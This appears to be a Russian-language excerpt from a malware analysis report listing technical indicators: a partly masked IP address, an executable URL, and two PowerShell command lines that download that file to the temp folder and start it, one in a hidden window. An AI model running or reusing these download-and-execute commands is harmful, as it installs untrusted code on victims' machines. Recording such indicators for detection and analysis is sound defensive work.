Техническая информация
- http://34.##.116.148/jalv/09.exe как %temp%\lwodkwudnm91.exe
- '34.##.116.148':80
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://34.##.116.148/jalv/09.exe','%temp%\lwodkwudnm91.exe'); Start '%temp%\lwodkwudnm91.exe'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://34.##.116.148/jalv/09.exe','%temp%\lwodkwudnm91.exe'); Start '%temp%\lwodkwudnm91.exe'